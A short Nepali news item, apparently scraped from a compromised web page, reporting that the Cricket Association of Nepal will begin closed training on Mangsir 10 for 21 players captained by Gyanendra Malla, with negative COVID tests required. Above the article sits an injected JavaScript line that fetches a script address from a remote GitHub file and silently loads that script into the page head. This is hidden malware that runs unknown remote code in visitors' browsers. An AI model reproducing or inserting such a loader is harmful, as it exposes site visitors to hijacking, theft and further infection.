;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर ०६,
काठमाडौं । नेपाक क्रिकेट संघ क्यानले बन्द प्रशिक्षण सुरु गर्ने भएको छ ।
आगामी मंसिर १० गतेदेखि प्रशिक्षण सुरु गर्नलागेको संघले सूचना मार्फत जनाएको छ । प्रशिक्षणमा सहभागी हुनको लागि खेलाडीहरुको कोरोना भाइरस संक्रमणको परीक्षण रिपोर्ट नेगेटिभ हुनु पर्ने सूचनामा उल्लेख छ ।
ज्ञनेन्द्र मल्लको कप्तानीमा २१ जना खेलाडीलाफ प्रशिक्षणको लागि डाकेको हो ।
फेसबुक प्रतिक्रियाहरु